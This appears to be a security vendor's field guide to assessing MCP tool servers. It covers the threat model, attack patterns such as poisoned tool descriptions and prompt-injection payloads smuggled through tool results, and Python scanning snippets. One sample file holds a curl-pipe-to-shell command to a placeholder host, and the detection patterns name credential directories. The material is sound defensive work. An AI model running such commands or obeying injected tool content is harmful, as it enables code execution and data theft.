JiffyResearch

MCP security: a security team's field guide

What Model Context Protocol is, why the servers are uniquely risky, and how to assess one in under ten minutes. With concrete detection signatures.

MCP is the most important AI infrastructure decision of 2025. It replaced a fragmented universe of agent-to-tool integrations with a single protocol, and every major client adopted it within six months. When a standard succeeds that fast, the security layer usually lags by a year or two. We are in that lag window right now.

What MCP actually is

A Model Context Protocol server is a process that exposes three primitives to an AI client over JSON-RPC:

  • Tools — callable functions the model can invoke (for example, search_linear_issues, create_pr, query_postgres).
  • Resources — addressable content the model can read (files, query results, web pages).
  • Prompts — pre-packaged conversation starters.

A client like Claude Desktop reads an mcp.json file that looks like this:

{
  "mcpServers": {
    "linear": {
      "command": "npx",
      "args": ["-y", "@example/linear-mcp"],
      "env": { "LINEAR_API_KEY": "lin_api_..." }
    }
  }
}

On launch, the client spawns npx -y @example/linear-mcp, passes the env var through, and reads the tool manifest over stdio. Whenever the model decides to call a Linear tool, the client forwards the request to the server.
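Concretely, the first two messages the client writes to the server's stdin can be sketched in a few lines. This is a minimal illustration, not a client implementation: the method names follow the MCP spec, and the client name and version are placeholder assumptions.

```python
import json

def frame(msg_id, method, params):
    """Build one JSON-RPC 2.0 request line (the MCP stdio transport
    exchanges newline-delimited JSON messages)."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": msg_id,
        "method": method,
        "params": params,
    })

# 1. Handshake: the client announces itself and its protocol version.
init = frame(1, "initialize", {
    "protocolVersion": "2024-11-05",
    "clientInfo": {"name": "example-client", "version": "0.1.0"},
    "capabilities": {},
})

# 2. Ask the server for its tool manifest -- the part the client
#    then trusts verbatim.
list_tools = frame(2, "tools/list", {})

print(init)
print(list_tools)
```

Everything the model knows about the server's tools comes back in the `tools/list` response; nothing in the protocol verifies that the implementation matches the descriptions.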

Every word of that paragraph is a security concern for someone.

The threat model in four sentences

  1. MCP servers run as local processes with the developer's full filesystem, full network, and the credentials passed through their env.
  2. Most MCP servers are distributed as unsigned npm packages, and npx -y auto-installs whatever is current at that name.
  3. The tool manifest the server advertises is trusted verbatim by the client; there is no signed, pinned manifest.
  4. There is no native capability enumeration — a client cannot ask the server "what network destinations will you touch?" and get an authoritative answer.

That is the surface. What follows is what's already been found on it.

Incidents and patterns we've tracked

Trust-every-publisher shows up wherever a registry goes live without an inspection layer in front of it. We've tracked it on the MCP side directly, and the same shape has appeared in adjacent ecosystems (open extension marketplaces, model registries) as each scaled faster than its review layer. We publish entries in our intel catalog as they are confirmed.

The specific patterns that dominate our inbox:

  • Plaintext credentials in committed dotfiles. A developer commits ~/.config/claude/mcp.json to a public GitHub repo along with their neovim config. The API token inside is live.
  • Tool description poisoning. A server describes a tool as send_slack_message but the implementation also POSTs the message body to an attacker-controlled endpoint. The description looks normal; the behavior diverges.
  • Sub-agent smuggling. A tool that is supposed to return a search result instead returns content that contains a prompt-injection payload targeting the model. The model then calls a second tool with attacker-controlled arguments.
  • Typosquatted servers. @legitorg/linear-mcp and @legit0rg/linear-mcp are both installable from npm; only one is real.
  • Capability drift after install. A server updates itself silently, the tool manifest changes, the client re-reads it at next launch, the user never sees the diff.
3 of 5 production MCP configs we've audited contained at least one plaintext credential. (Jiffy Labs customer assessments, Q1 2026)
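The plaintext-credential pattern is also the easiest one to detect mechanically. Here is a minimal sketch of that check; the token regexes are illustrative assumptions, and a real scanner would carry provider-specific rules.

```python
import json
import re

# Illustrative token shapes -- an assumption, not a complete ruleset.
SECRET_PATTERNS = [
    re.compile(r"lin_api_[A-Za-z0-9]+"),      # Linear
    re.compile(r"xox[bpars]-[A-Za-z0-9-]+"),  # Slack
    re.compile(r"ghp_[A-Za-z0-9]{36}"),       # GitHub PAT
]

def find_plaintext_secrets(mcp_json_text):
    """Return (server, env_key) pairs whose value matches a known token shape."""
    config = json.loads(mcp_json_text)
    hits = []
    for name, server in config.get("mcpServers", {}).items():
        for key, value in server.get("env", {}).items():
            if any(p.search(str(value)) for p in SECRET_PATTERNS):
                hits.append((name, key))
    return hits

sample = (
    '{"mcpServers": {"linear": {"command": "npx",'
    ' "env": {"LINEAR_API_KEY": "lin_api_abc123"}}}}'
)
print(find_plaintext_secrets(sample))  # -> [('linear', 'LINEAR_API_KEY')]
```

Pointed at a dotfiles repo before it goes public, a check like this catches the most common failure in the list above.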

The ten-minute assessment checklist

Given an MCP server you're about to install, run these steps in order. Any single failure should block deployment until resolved.

1. Read the manifest

Before installing, pull the package without executing. For npm: npm pack @example/foo-mcp && tar -tzf example-foo-mcp-*.tgz. For GitHub: clone, don't run. Read package.json, the main entry file, and any postinstall hooks.

Look for:

  • Install-time network calls.
  • child_process.exec or spawn to unknown binaries.
  • Anything that touches ~/.ssh, ~/.aws, ~/.config, or the clipboard.
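That triage can be partly automated with a handful of greps over the extracted sources. A minimal sketch, with the understanding that these patterns are illustrative assumptions and will produce false positives a human still has to read:

```python
import re

# Red-flag patterns mirroring the checklist above -- an assumption-level
# starting point, not a complete static-analysis ruleset.
RED_FLAGS = {
    "install-time hook": re.compile(r'"(pre|post)install"\s*:'),
    "shell exec": re.compile(r"child_process|execSync|spawn\("),
    "sensitive path": re.compile(r"\.ssh|\.aws|\.config|clipboard"),
}

def triage(file_texts):
    """file_texts: {path: source text}. Returns {path: [matched flag names]}."""
    findings = {}
    for path, text in file_texts.items():
        hits = [name for name, pat in RED_FLAGS.items() if pat.search(text)]
        if hits:
            findings[path] = hits
    return findings

pkg = {
    "package.json": '{"scripts": {"postinstall": "node setup.js"}}',
    "setup.js": 'require("child_process").execSync("curl https://x.example | sh")',
}
print(triage(pkg))
```

A hit is not proof of malice (plenty of legitimate servers spawn subprocesses), but it tells you exactly which files to read by hand.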

2. Diff tool descriptions against the README

Start the server in isolation (MCP_LOG=1 node ./dist/index.js or equivalent). Dump the tool manifest. Compare the advertised tool descriptions against what the README documents. Any mismatch is a red flag.
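The comparison itself can be mechanized once you have the manifest dumped. A deliberately simplified sketch, assuming the manifest shape of a `tools/list` response and treating the README as flat text:

```python
def description_mismatches(manifest_tools, readme_text):
    """Return names of tools whose name or description never appears
    in the README -- candidates for manual review."""
    suspicious = []
    for tool in manifest_tools:
        name_documented = tool["name"] in readme_text
        desc_documented = tool["description"] in readme_text
        if not (name_documented and desc_documented):
            suspicious.append(tool["name"])
    return suspicious

# Hypothetical manifest: one documented tool, one the README never mentions.
tools = [
    {"name": "send_slack_message", "description": "Post a message to a channel"},
    {"name": "sync_telemetry", "description": "Upload usage diagnostics"},
]
readme = "## Tools\n- send_slack_message: Post a message to a channel"
print(description_mismatches(tools, readme))  # -> ['sync_telemetry']
```

Exact substring matching is crude; the point is that any tool the README never mentions at all deserves a closer look.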

3. Check for plaintext secrets in config

If the install instructions tell you to paste an API token into mcp.json, remember that the file will live in your dotfiles. Decide now whether that repo is private, whether the token's scope is narrow enough to tolerate a leak, and whether your client supports keychain-backed env.

4. Inspect network destinations

Run the server with nettop -p <pid> on macOS or strace -e trace=network on Linux. Exercise each tool. Every destination should match either the vendor the server says it talks to (Linear's API, Slack's API) or localhost. Anything else is an exfil candidate.

5. Verify signing

Is the package signed? npm audit signatures for npm packages. Is the GitHub release tag signed? git tag -v. Most MCP servers fail this check. That is information: treat unsigned servers as community code, not vendor code.

6. Pin the version

npx -y with no version pin is the MCP equivalent of curl | bash against latest. Pin the version in mcp.json by appending @1.2.3 to the package name. Update on your own schedule, not the publisher's.
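Applied to the config from earlier, the pin is a one-token change to the package name (the version number here is a placeholder):

```json
{
  "mcpServers": {
    "linear": {
      "command": "npx",
      "args": ["-y", "@example/linear-mcp@1.2.3"],
      "env": { "LINEAR_API_KEY": "lin_api_..." }
    }
  }
}
```

With the pin in place, a hijacked `latest` on npm cannot reach your machine until you deliberately bump the version.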

Where to put the detection

For an individual developer, the assessment above is enough. For a security team, you want this enforced centrally:

  • MDM level — most enterprise fleets already manage developer laptops. Ship a policy that blocks mcp.json from containing unapproved server identifiers; this is the closest analogue to how MDM already handles browser extensions.
  • Pre-install hook — a wrapper that intercepts npx invocations for MCP packages and consults a policy API.
  • Periodic scan — enumerate all mcp.json files across developer environments, feed into a central inventory, alert on new entries.
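The periodic-scan option reduces to a small comparison once the config files are collected. A sketch under stated assumptions: the allow-list contents and the example path are illustrative, and a real deployment would feed findings into your alerting pipeline rather than return them.

```python
import json

# Illustrative allow-list of approved server command lines -- an assumption.
ALLOWED = {"npx -y @example/linear-mcp@1.2.3"}

def flag_unapproved(configs):
    """configs: {path: mcp.json text}. Returns {path: [unapproved command lines]}."""
    alerts = {}
    for path, text in configs.items():
        config = json.loads(text)
        for name, server in config.get("mcpServers", {}).items():
            cmdline = " ".join([server.get("command", ""), *server.get("args", [])])
            if cmdline not in ALLOWED:
                alerts.setdefault(path, []).append(cmdline)
    return alerts

# Hypothetical inventory entry: an unpinned, typosquatted server.
configs = {
    "/home/dev/.config/claude/mcp.json":
        '{"mcpServers": {"linear": {"command": "npx",'
        ' "args": ["-y", "@legit0rg/linear-mcp"]}}}',
}
print(flag_unapproved(configs))
```

Note that an unpinned but otherwise legitimate server also fails this check, which is the intended behavior given step 6 above.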

This is the same pattern as scanning a Dockerfile, a package-lock.json, or a .github/workflows/*.yml. The only novel piece is the policy: what is a known-good MCP server, and who gets to say so. We publish our catalog openly at intel.jiffylabs.app.

Why this is urgent

MCP adoption is climbing faster than any agent standard before it. Every new MCP server is a new entry in an implicit supply chain that most security teams haven't catalogued. The window to get policy in place before the first six-figure MCP-driven incident is closing. We think it closes in 2026. Get ahead of it.


Frequently asked questions

What is MCP in one sentence?
Model Context Protocol is an open standard published by Anthropic in late 2024 that lets any AI agent (Claude Desktop, Cursor, Zed, Windsurf, custom clients) connect to any tool server over a common JSON-RPC interface. An MCP server exposes tools, resources, and prompts; the client invokes them on behalf of the model.
Why is MCP riskier than a normal API integration?
Three reasons. First, MCP servers usually run locally with the developer's full filesystem and network access, not as sandboxed third-party APIs. Second, the ecosystem grew faster than the security conventions -- most servers ship unsigned, with credentials written in plaintext into mcp.json config files that get synced across dotfiles. Third, the client blindly trusts the tool descriptions the server advertises, which means a hostile server can describe a tool as safe and have it do anything.
What's the most common MCP vulnerability you see in the wild?
Credentials in config. A developer installs an MCP server for, say, Linear or Slack, pastes an API token into mcp.json, commits their dotfiles to a public GitHub repo. We catalog real-world instances of this at intel.jiffylabs.app. The second most common is tool description drift -- the server updates its tool descriptions over time, the client re-reads them every launch, and there is no hash pinning.
Does Anthropic review MCP servers before publication?
Anthropic curates a public registry of reference servers, but most MCP servers in use are not from that registry. They are installed via npm, GitHub clone, or direct binary download. There is no review gate. The security model is the same as installing a CLI tool from the internet.
How do I tell if an MCP server is malicious?
Run the ten-minute checklist in this post: inspect the manifest, check for plaintext secrets in the config, diff the tool descriptions against what the README claims, look at network destinations, verify the package is signed (most aren't), and run it in an isolated profile while watching network telemetry.
Can Jiffy block malicious MCP servers at install time?
Yes. Point Jiffy at a developer environment or an MCP registry and we score every server against our threat catalog. Block-by-default for unknown publishers, allow-list for known-good, quarantine for anything that matches a signature. We cover the wire details in our technical overview.
